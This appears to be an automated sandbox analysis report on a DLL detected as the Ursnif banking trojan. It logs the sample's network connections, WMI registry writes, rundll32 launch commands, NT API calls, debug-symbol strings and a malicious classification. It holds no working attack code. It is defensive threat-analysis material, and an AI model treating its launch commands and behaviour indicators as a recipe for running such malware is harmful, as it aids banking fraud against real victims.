                      Source: unknown | HTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49772 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.223.66:443 -> 192.168.2.7:49773 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49774 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49775 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.7:49776 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49810 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49812 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49842 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49843 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.137.114:443 -> 192.168.2.7:49844 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49845 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49846 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.98.214.82:443 -> 192.168.2.7:49847 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: loaddll32.exe, 00000000.00000002.768381910.00000000010AB000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Ursnif

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 6yDD19jMIu.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C21B4
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4D5600
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E518C9B
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E4D5600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E50D630
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E523CCE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E50B597
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E52FA78
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E51A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E52FB98
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E4FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E4D5600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E50D630
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E523CCE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E50B597
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E51A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E4FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E4FAEC0 appears 38 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E508487 appears 34 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E4FABD1 appears 182 times
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C23D5 NtQueryVirtualMemory,
                      Source: 6yDD19jMIu.dll | Virustotal: Detection: 9%
                      Source: 6yDD19jMIu.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 640
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE20.tmp
                      Source: classification engine | Classification label: mal96.troj.evad.winDLL@14/12@26/9
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4040
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess892
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1820
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: 6yDD19jMIu.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 6yDD19jMIu.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb& source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb7 source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.464515303.0000000005490000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.471624682.00000000051F2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474313547.0000000005861000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497779494.0000000005404000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbT) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbD source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465473055.00000000035AC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.477462780.000000000324C000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb; source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0 source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.471624682.00000000051F2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474313547.0000000005861000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497779494.0000000005404000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdby' source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbN source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbf) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbM source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb* source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465197464.00000000035B8000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb, source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbz source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.463108056.0000000002D40000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465473055.00000000035AC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.477462780.000000000324C000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbR source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbX) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbg source: WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbX source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbN source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbl) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb1 source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdb> source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.775494976.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776806344.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.471242410.000000006E53B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
                      Source: Binary string: advapi32.pdbH source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbN source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.463129538.0000000002D4C000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465197464.00000000035B8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.464251828.0000000002D46000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465353270.00000000035B2000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbd source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbd source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb\ source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C2150 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C21A3 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4FAB9A push ecx; ret
